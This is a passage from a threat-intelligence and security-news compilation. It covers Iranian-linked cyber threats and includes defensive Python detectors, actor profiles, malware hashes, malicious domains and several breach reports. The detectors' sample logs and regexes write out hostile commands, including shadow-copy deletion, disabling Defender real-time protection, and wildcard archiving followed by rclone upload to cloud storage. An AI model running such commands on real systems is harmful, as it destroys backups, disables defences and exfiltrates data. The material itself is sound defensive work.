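    count AND whose sources span >= min_prefixes distinct /24 networks.
    The second condition separates a distributed flood from one noisy
    client. Returns {minute: (requests, distinct_prefixes)}."""
    per_minute = defaultdict(list)
    for e in parse(lines):
        per_minute[e["ts"][:16]].append(e["ip"])
    baseline = median(len(ips) for ips in per_minute.values())
    hits = {}
    for minute, ips in per_minute.items():
        prefixes = {".".join(ip.split(".")[:3]) for ip in ips}
        if len(ips) >= factor * baseline and len(prefixes) >= min_prefixes:
            hits[minute] = (len(ips), len(prefixes))
    return hits


def detect_admin_probing(lines, min_hits=10):
    """Sources with >= min_hits rejected requests (401/403/404) to admin paths."""
    counts = defaultdict(int)
    for e in parse(lines):
        if e["path"].startswith(ADMIN_PATHS) and e["status"] in ("401", "403", "404"):
            counts[e["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    log = build_sample_log()
    print("spike minutes:", detect_request_spike(log))
    print("admin probing:", detect_admin_probing(log))
```

The median baseline is deliberately computed from the same data, so a single spike minute does not drag the baseline up; in production you would compute it from a longer history window than the minute being judged.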
Credential attacks
Credential attacks are one of the most common initial access techniques used by Iranian-linked groups, which include attack attempts against multiple public-facing services.

Defenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts, such as the following:

Repeated login failure attempts across multiple users
Authentication attempts from unusual geographic locations
MFA fatigue attacks
Login attempts occurring outside of normal working hours
Vulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure
Deployment of web shells on internet-facing servers
Credential harvesting through phishing campaigns
Organizations should review and harden any identity security mechanisms by performing the following:

Enable multi-factor authentication for all remote access
Disable legacy authentication protocols
Implement conditional access policies based on location and device risk
Restrict admin logins to specific locations, where possible
Monitor identity provider logs for any anomalies
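Three of the password-spraying indicators listed above (failures across many accounts from one source, attempts outside working hours, and MFA fatigue) can be expressed as window-based aggregations over authentication logs. The block below is an added example and not code from the original report; the log format (timestamp, user, source IP, country, result), the result codes and the thresholds are assumptions chosen for the constructed sample:

```python
"""Detect password-spray, off-hours and MFA-fatigue patterns in
authentication logs.

Added example, not from the original report. The log format
(<ISO timestamp>,<user>,<source ip>,<country>,<result>), the result codes
and the thresholds are assumptions chosen for the constructed sample.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source fails against six accounts in under a
# minute at 02:10 UTC; 'ivan' mistypes once and then succeeds; 'heidi'
# rejects four MFA prompts in three minutes.
SAMPLE_LOG = """\
2026-03-05T02:10:01Z,alice,203.0.113.7,NL,FAIL
2026-03-05T02:10:04Z,bob,203.0.113.7,NL,FAIL
2026-03-05T02:10:08Z,carol,203.0.113.7,NL,FAIL
2026-03-05T02:10:12Z,dave,203.0.113.7,NL,FAIL
2026-03-05T02:10:15Z,erin,203.0.113.7,NL,FAIL
2026-03-05T02:10:19Z,frank,203.0.113.7,NL,FAIL
2026-03-05T09:15:30Z,grace,198.51.100.20,IL,SUCCESS
2026-03-05T10:02:11Z,ivan,198.51.100.21,IL,FAIL
2026-03-05T10:02:40Z,ivan,198.51.100.21,IL,SUCCESS
2026-03-05T14:00:05Z,heidi,203.0.113.9,NL,MFA_DENIED
2026-03-05T14:00:50Z,heidi,203.0.113.9,NL,MFA_DENIED
2026-03-05T14:01:40Z,heidi,203.0.113.9,NL,MFA_DENIED
2026-03-05T14:02:55Z,heidi,203.0.113.9,NL,MFA_DENIED
"""


def parse_log(text=SAMPLE_LOG):
    events = []
    for line in text.strip().splitlines():
        ts, user, ip, country, result = line.split(",")
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "user": user, "ip": ip, "country": country, "result": result})
    return sorted(events, key=lambda e: e["ts"])


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Source IPs whose failed logins hit >= min_users distinct accounts
    inside any `window`. Counting accounts rather than attempts is what
    separates a spray from one user who forgot a password.
    Returns {ip: distinct_users}."""
    by_ip = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            by_ip[e["ip"]].append(e)
    hits = {}
    for ip, evs in by_ip.items():
        best = 0
        for i, start in enumerate(evs):
            users = {x["user"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            best = max(best, len(users))
        if best >= min_users:
            hits[ip] = best
    return hits


def detect_off_hours(events, start_hour=8, end_hour=18):
    """Attempts outside [start_hour, end_hour) UTC; returns (user, ip, ts)."""
    return [(e["user"], e["ip"], e["ts"].isoformat())
            for e in events if not start_hour <= e["ts"].hour < end_hour]


def detect_mfa_fatigue(events, window=timedelta(minutes=5), min_prompts=3):
    """Users who rejected >= min_prompts MFA prompts inside any `window`."""
    by_user = defaultdict(list)
    for e in events:
        if e["result"] == "MFA_DENIED":
            by_user[e["user"]].append(e["ts"])
    flagged = []
    for user, stamps in by_user.items():
        if any(sum(1 for t in stamps[i:] if t - start <= window) >= min_prompts
               for i, start in enumerate(stamps)):
            flagged.append(user)
    return sorted(flagged)


def run_detections(text=SAMPLE_LOG):
    events = parse_log(text)
    return {"spray": detect_spray(events),
            "off_hours": detect_off_hours(events),
            "mfa_fatigue": detect_mfa_fatigue(events)}


if __name__ == "__main__":
    for name, result in run_detections().items():
        print(f"{name}: {result}")
```

The off-hours check is noisy on its own (shift workers, travel), which is why it is reported separately rather than folded into the spray score; it becomes useful when it coincides with a spray source or an unusual country for that user.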
Leak campaigns and intimidation operations
Hacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological pressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators of data staging or exfiltration, such as the following:

Unusual downloads from email systems
Unusual access to document repositories
Suspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple file types
Large outbound data transfers to external cloud storage platforms
Unexpected use of data-transfer applications (e.g. Rclone) in their environment
Organizations should focus on the following:

Monitor for large outbound data transfers
Implement data loss prevention (DLP) policies
Restrict access to external cloud storage platforms
Enable auditing of email and file access
Having a communications plan for potential leak claims can also help organizations respond quickly to these threats.
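The staging and exfiltration indicators above (wildcard archiving of several file types, unexpected transfer tools such as Rclone, and large outbound volumes to cloud storage) can be checked against process-creation events and flow records. This is an added example and not code from the original report; the event formats, the tool and domain lists and the 500 MB threshold are assumptions for the constructed sample:

```python
"""Spot data-staging and exfiltration indicators: wildcard archiving of
several file types, unexpected transfer tools, and large outbound volumes
to cloud-storage domains.

Added example, not from the original report. The event formats, the tool
and domain lists and the 500 MB threshold are assumptions for the
constructed sample; tune them to your own environment.
"""
import re
from collections import defaultdict

ARCHIVERS = {"7z.exe", "winrar.exe", "rar.exe"}
TRANSFER_TOOLS = {"rclone.exe", "megacmd.exe"}   # assumed: not sanctioned here
CLOUD_STORAGE = {"backblazeb2.com", "dropbox.com", "mega.nz", "drive.google.com"}
LARGE_OUTBOUND_BYTES = 500 * 1024 * 1024

# Constructed process events: <host>,<image>,<command line>
PROCESS_EVENTS = """\
WS-014,7z.exe,7z.exe a C:\\Users\\Public\\s.7z *.docx *.xlsx *.pdf *.pst
WS-014,rclone.exe,rclone.exe copy C:\\Users\\Public\\s.7z remote:bucket
WS-022,WinRAR.exe,WinRAR.exe a D:\\backup\\logs.rar *.log
SRV-03,svchost.exe,svchost.exe -k netsvcs
"""

# Constructed flow records: <host>,<destination host name>,<bytes out>
FLOW_RECORDS = """\
WS-014,example-bucket.s3.us-east-005.backblazeb2.com,734003200
WS-014,example-bucket.s3.us-east-005.backblazeb2.com,104857600
WS-022,updates.example.com,52428800
WS-031,dropbox.com,10485760
"""


def parse_csv(text, fields):
    """Split lines into dicts; the last field may itself contain commas."""
    return [dict(zip(fields, line.split(",", len(fields) - 1)))
            for line in text.strip().splitlines()]


def detect_archive_staging(process_text=PROCESS_EVENTS, min_types=3):
    """Archiver runs that sweep up >= min_types file extensions by wildcard.
    A backup job archiving one type does not trigger. Returns {host: n}."""
    hits = {}
    for row in parse_csv(process_text, ("host", "image", "cmdline")):
        if row["image"].lower() in ARCHIVERS:
            exts = {e.lower() for e in re.findall(r"\*\.(\w+)", row["cmdline"])}
            if len(exts) >= min_types:
                hits[row["host"]] = max(hits.get(row["host"], 0), len(exts))
    return hits


def detect_transfer_tools(process_text=PROCESS_EVENTS):
    """Hosts that ran a transfer tool not expected in the environment."""
    return sorted({row["host"]
                   for row in parse_csv(process_text, ("host", "image", "cmdline"))
                   if row["image"].lower() in TRANSFER_TOOLS})


def is_cloud_storage(name):
    name = name.lower()
    return any(name == d or name.endswith("." + d) for d in CLOUD_STORAGE)


def detect_large_outbound(flow_text=FLOW_RECORDS, threshold=LARGE_OUTBOUND_BYTES):
    """Hosts whose summed outbound bytes to cloud storage reach threshold."""
    totals = defaultdict(int)
    for row in parse_csv(flow_text, ("host", "dest", "bytes_out")):
        if is_cloud_storage(row["dest"]):
            totals[row["host"]] += int(row["bytes_out"])
    return {h: b for h, b in totals.items() if b >= threshold}


def correlate(process_text=PROCESS_EVENTS, flow_text=FLOW_RECORDS):
    """Hosts matching more than one indicator deserve the first look."""
    signals = defaultdict(set)
    for h in detect_archive_staging(process_text):
        signals[h].add("archive_staging")
    for h in detect_transfer_tools(process_text):
        signals[h].add("transfer_tool")
    for h in detect_large_outbound(flow_text):
        signals[h].add("large_outbound")
    return {h: sorted(s) for h, s in signals.items() if len(s) > 1}


if __name__ == "__main__":
    print(correlate())
```

Summing bytes per host across records matters because an exfiltration is often split into several uploads, none of which is individually large; the suffix match on the destination name is what lets a bucket-specific host name such as the backblazeb2 one above map back to the storage provider.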

Attacks on critical infrastructure
Critical infrastructure organizations and companies that support military logistics may face attacks that attempt to compromise the following:

Operational Technology (OT) interfaces
Scheduling and logistics systems
Contractor networks
Remote management systems
Security teams should ensure adequate monitoring is in place for:

Abnormal access to ICS
Unexpected remote connections to operational networks
Authentication attempts targeting infrastructure management systems
Unusual configuration changes in critical systems
Vendor access and contractor networks
Organizations faced with these attacks should, at a minimum:

Segment operational technology networks from other networks
Restrict remote access to infrastructure systems
Monitor contractor VPN access
Maintain offline backups of critical system configurations
Destructive attacks
Iran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which targeted Saudi Arabia's oil industry to wipe thousands of systems.

Organizations that anticipate such attacks should ensure they monitor for indicators that attackers may be preparing for a destructive operation such as:

Mass scheduled task creation
Attempts to disable security applications
Deletion of shadow copies or backup data
Unusual administrative commands executed across multiple hosts
Organizations should prioritize resilience against destructive attacks by conducting the following tasks:

Isolate backup infrastructure from production networks
Enable immutable backups
Test disaster recovery procedures regularly
Ensuring systems can be restored quickly is critical to recovering from the impact of destructive attacks.
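The four destructive-attack precursors listed above (mass scheduled task creation, attempts to disable security applications, deletion of shadow copies or backups, and the same administrative command run across many hosts) are all visible in process-creation telemetry. The block below is an added example and not code from the original report; the event format, the command patterns and the thresholds are assumptions chosen for the constructed sample, and the hosts and task names are invented:

```python
"""Score hosts for destructive-attack precursors in process-creation events.

Added example, not from the original report. The event format
(<ISO ts>,<host>,<image>,<command line>), the regexes and the thresholds
are assumptions for the constructed sample; the host names are invented.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: SRV-01 creates five scheduled tasks in under a minute,
# deletes shadow copies and disables real-time protection; SRV-02..04 receive
# the same boot-policy change within two minutes; WS-010 is one ordinary task.
SAMPLE_EVENTS = """\
2026-03-06T09:30:00Z,WS-010,schtasks.exe,schtasks.exe /create /tn NightlyBackup /tr C:\\Tools\\backup.cmd /sc daily
2026-03-06T21:00:01Z,SRV-01,schtasks.exe,schtasks.exe /create /tn Upd1 /tr C:\\Temp\\u.exe /sc onstart
2026-03-06T21:00:09Z,SRV-01,schtasks.exe,schtasks.exe /create /tn Upd2 /tr C:\\Temp\\u.exe /sc onstart
2026-03-06T21:00:17Z,SRV-01,schtasks.exe,schtasks.exe /create /tn Upd3 /tr C:\\Temp\\u.exe /sc onstart
2026-03-06T21:00:26Z,SRV-01,schtasks.exe,schtasks.exe /create /tn Upd4 /tr C:\\Temp\\u.exe /sc onstart
2026-03-06T21:00:40Z,SRV-01,schtasks.exe,schtasks.exe /create /tn Upd5 /tr C:\\Temp\\u.exe /sc onstart
2026-03-06T21:01:10Z,SRV-01,vssadmin.exe,vssadmin.exe delete shadows /all /quiet
2026-03-06T21:01:30Z,SRV-01,powershell.exe,powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true
2026-03-06T21:05:00Z,SRV-02,bcdedit.exe,bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2026-03-06T21:05:20Z,SRV-03,bcdedit.exe,bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2026-03-06T21:06:00Z,SRV-04,bcdedit.exe,bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
"""

ADMIN_IMAGES = {"schtasks.exe", "vssadmin.exe", "wmic.exe", "wbadmin.exe",
                "bcdedit.exe", "sc.exe", "net.exe", "reg.exe", "powershell.exe"}
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
    r"|wbadmin(\.exe)?\s+delete\s+catalog", re.I)
SECURITY_DISABLE = re.compile(
    r"Set-MpPreference\s+-Disable\w+|\b(net|sc)(\.exe)?\s+stop\s+(windefend|sense)\b", re.I)


def parse_events(text=SAMPLE_EVENTS):
    events = []
    for line in text.strip().splitlines():
        ts, host, image, cmdline = line.split(",", 3)
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "host": host, "image": image.lower(),
                       "cmdline": " ".join(cmdline.split())})
    return sorted(events, key=lambda e: e["ts"])


def detect_mass_task_creation(events, window=timedelta(minutes=10), min_tasks=5):
    """Hosts creating >= min_tasks scheduled tasks inside any `window`."""
    by_host = defaultdict(list)
    for e in events:
        if e["image"] == "schtasks.exe" and "/create" in e["cmdline"].lower():
            by_host[e["host"]].append(e["ts"])
    hits = {}
    for host, stamps in by_host.items():
        best = max(sum(1 for t in stamps[i:] if t - start <= window)
                   for i, start in enumerate(stamps))
        if best >= min_tasks:
            hits[host] = best
    return hits


def detect_pattern(events, pattern):
    """(host, cmdline) pairs whose command line matches `pattern`."""
    return [(e["host"], e["cmdline"]) for e in events if pattern.search(e["cmdline"])]


def detect_multi_host_admin(events, window=timedelta(minutes=10), min_hosts=3):
    """Identical admin command lines on >= min_hosts distinct hosts inside
    `window`, the fingerprint of a command pushed out fleet-wide."""
    by_cmd = defaultdict(list)
    for e in events:
        if e["image"] in ADMIN_IMAGES:
            by_cmd[e["cmdline"].lower()].append(e)
    hits = {}
    for cmd, evs in by_cmd.items():
        for i, start in enumerate(evs):
            hosts = sorted({x["host"] for x in evs[i:] if x["ts"] - start["ts"] <= window})
            if len(hosts) >= min_hosts:
                hits[cmd] = hosts
                break
    return hits


def score_hosts(events):
    """Distinct precursor categories seen per host; two or more is urgent."""
    score = defaultdict(set)
    for host in detect_mass_task_creation(events):
        score[host].add("mass_tasks")
    for host, _ in detect_pattern(events, SHADOW_DELETE):
        score[host].add("shadow_delete")
    for host, _ in detect_pattern(events, SECURITY_DISABLE):
        score[host].add("security_disable")
    for hosts in detect_multi_host_admin(events).values():
        for host in hosts:
            score[host].add("multi_host_admin")
    return {h: sorted(c) for h, c in score.items()}


if __name__ == "__main__":
    print(score_hosts(parse_events()))
```

Scoring by category rather than by raw hit count is deliberate: one wiper precursor on a host can be an administrator doing maintenance, but a host that hits three categories inside a few minutes should be isolated first and explained later.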

Historical activity
Stuxnet
One of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent days. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one of the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in U.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable.

Stuxnet was among the first known major nation-state cyberattacks to demonstrate hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first publicly documented by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was only discovered after penetrating private networks, it is quite possible that cyber operations are currently being leveraged by and against infrastructure that we know nothing about - yet.

Reports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).

Damselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.

Other key actors
Druidfly
Druidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks.

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).

On June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.

Case study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.

Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

HTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks
Use of the remote desktop tools AnyDesk and ScreenConnect
Use of ReGeorg web shells
Damselfly
Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

In 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.

Mantis
Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23) is an Arabic-speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East, but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations internally within Gaza. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

Indicators of Compromise (IOCs)
0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 - Trojan.Dindoor

1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 - Trojan.Dindoor

2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 - Trojan.Dindoor

2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - Trojan.Dindoor

42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f - Trojan.Dindoor

7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 - Trojan.Dindoor

7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef - Trojan.Dindoor

b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 - Trojan.Dindoor

bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a - Trojan.Dindoor

c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e - Trojan.Dindoor

077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de - Trojan.Fakeset

15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 - Trojan.Fakeset

2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 - Trojan.Fakeset

4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be - Trojan.Fakeset

64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb - Trojan.Fakeset

64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 - Trojan.Fakeset

74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d - Trojan.Fakeset

94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 - Trojan.Fakeset

a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 - Trojan.Fakeset

a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c - Trojan.Fakeset

ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 - Trojan.Fakeset

24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 - Trojan.Stagecomp

a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 - Trojan.Stagecomp

3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 - Trojan.Darkcomp

1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 - Trojan.Darkcomp

Network Indicators

gitempire.s3.us-east-005.backblazeb2[.]com

elvenforest.s3.us-east-005.backblazeb2[.]com

uppdatefile[.]com

serialmenot[.]com

moonzonet[.]com

security.com EN 2026 muddywater Seedworm US-Iran-War APT
Canadian Tire Data Breach Impacts 38 Million Accounts https://www.securityweek.com/canadian-tire-data-breach-impacts-38-million-accounts/
08/03/2026 11:44:35

securityweek.com
By Ionut Arghire | February 28, 2026 (6:50 AM ET)

More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire.

The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said.

“The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark’s/L’Équipeur and Party City,” the retail giant announced in October.

Canadian Tire said at the time that the compromised information included names, email addresses, dates of birth, encrypted passwords, and, in some cases, incomplete credit card numbers.

Fewer than 150,000 accounts had date of birth details compromised, the company said.

Canadian Tire also underlined that the password and credit card information could not be used to access users’ accounts or to perform fraudulent transactions and purchases, and that no Canadian Tire Bank information or Triangle Rewards loyalty data was compromised in the incident.

This week, the data set associated with the incident was added to the data breach notification website Have I Been Pwned.

According to the website, roughly 42 million records were compromised in the attack, including 38.3 million email addresses. In addition to the details shared by Canadian Tire, the leaked compromised data also includes addresses, phone numbers, and gender information.

“Passwords were stored as PBKDF2 hashes, and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry, and masked card number),” Have I Been Pwned notes.

Canadian Tire has notified the affected individuals via email but has yet to publicly confirm the number of victims.

securityweek.com EN 2026 Canada Canadian-Tire dataleak
Madison Square Garden Data Breach Confirmed Months After Hacker Attack https://www.securityweek.com/madison-square-garden-data-breach-confirmed-months-after-hacker-attack/
08/03/2026 11:42:53

securityweek.com
By Eduard Kovacs | March 2, 2026 (8:53 AM ET)

The company is one of the many victims of the 2025 Oracle E-Business Suite (EBS) hacking campaign.

Madison Square Garden has confirmed being impacted by a data breach stemming from a cybercrime campaign targeting customers of Oracle’s E-Business Suite (EBS) solution.

In the Oracle EBS hacking campaign, the Cl0p ransomware and extortion group exploited zero-day vulnerabilities to gain access to data stored by more than 100 organizations in the enterprise management software.

Madison Square Garden (MSG), the world-famous arena located in New York City, was named by the hackers as a victim of the campaign in November 2025.

Data allegedly stolen from the company — more than 210GB of archive files — was leaked by the cybercriminals soon after, indicating that it had refused to pay a ransom.

MSG did not respond to repeated requests for comment at the time. However, it has now confirmed suffering a data breach and it has started notifying individuals whose personal information was compromised as a result of the cybersecurity incident.

According to notifications from MSG Entertainment, the impacted Oracle EBS instance is hosted and managed by a third-party vendor, whose investigation found that hackers stole data in August 2025.

The entertainment company said personal information, including names and SSNs, was compromised.

It’s unclear how many people are affected in total, but MSG Entertainment told the Maine Attorney General’s Office that 11 of the state’s residents are impacted.

securityweek.com EN 2026 Oracle-E-Business-Suite EBS MSG Madison-Square-Garden Cl0p ransomware
Paint maker giant AkzoNobel confirms cyberattack on U.S. site https://www.bleepingcomputer.com/news/security/paint-maker-giant-akzonobel-confirms-cyberattack-on-us-site/
08/03/2026 11:40:21

bleepingcomputer.com
By Bill Toulas
March 3, 2026

The multinational Dutch paint company AkzoNobel has confirmed to BleepingComputer that hackers breached the network of one of its U.S. sites.

Following a data leak from the Anubis ransomware gang, a company spokesperson said that the intrusion has been contained and that the impact is limited.

“AkzoNobel has identified a security incident at one of our sites in the United States. The incident was limited to the respective site and was already contained,” the company told BleepingComputer.

“The impact is limited, and we are taking the appropriate steps to notify and support impacted parties, and will work closely with relevant authorities.”

AkzoNobel is a major paints and coatings company with 35,000 employees. It has an annual revenue exceeding $12 billion and active operations in over 150 countries. Brands under its corporate umbrella include Dulux, Sikkens, International, and Interpon.

Anubis ransomware claims to have stolen 170GB of data, almost 170,000 files, from AkzoNobel, and has published samples on its leak site, including screenshots of select documents and a list of the stolen files.

The published data contains confidential agreements with high-profile clients, email addresses and phone numbers, private email correspondence, passport scans, material testing documents, and internal technical specification sheets.

At the time of writing, the Anubis leak is only partial. AkzoNobel did not share with BleepingComputer any information on whether it engaged with the threat actor.

Anubis is a ransomware-as-a-service (RaaS) operation that launched in December 2024, offering affiliates 80% of the paid ransoms.

In February 2025, the operators launched an affiliate program on the RAMP forum, boosting its activity and influence in the cybercrime space.

In June the same year, Anubis added to its arsenal a data wiper that destroys the victim’s files to make recovery impossible.

bleepingcomputer.com EN 2026 AkzoNobel Anubis Anubis-Ransomware Data-Breach Data-Leak Double-Extortion Ransomware
TriZetto confirms 3.4M people's health and personal data was stolen during breach https://techcrunch.com/2026/03/06/trizetto-confirms-3-4m-peoples-health-and-personal-data-was-stolen-during-breach
08/03/2026 11:38:40

TechCrunch | techcrunch.com
Zack Whittaker
6:28 AM PST · March 6, 2026

Health tech giant TriZetto has confirmed that more than 3.4 million people had personal and health information stolen in a 2024 cyberattack, which the company failed to detect for almost a year.

The tech company, owned by multinational conglomerate Cognizant, serves around 200 million people across 875,000 healthcare providers throughout the U.S., according to its website. Doctors’ offices and healthcare providers use TriZetto to assess patients’ insurance for medical treatments.

TriZetto said in a filing with Maine’s attorney general on Friday that hackers stole patients’ insurance eligibility transaction reports from the company’s servers.

The data includes personal information like patients’ names, dates of birth, home addresses, and Social Security numbers, as well as information about their healthcare, such as their provider’s name, demographic data, and health and insurance details.

TriZetto said it identified the breach on October 2, 2025, but later discovered that the hackers had access as far back as November 2024.

Cognizant spokesperson William Abelson said the company “eliminated the threat” to its environment, but would not say why it took the company a year to detect the breach.

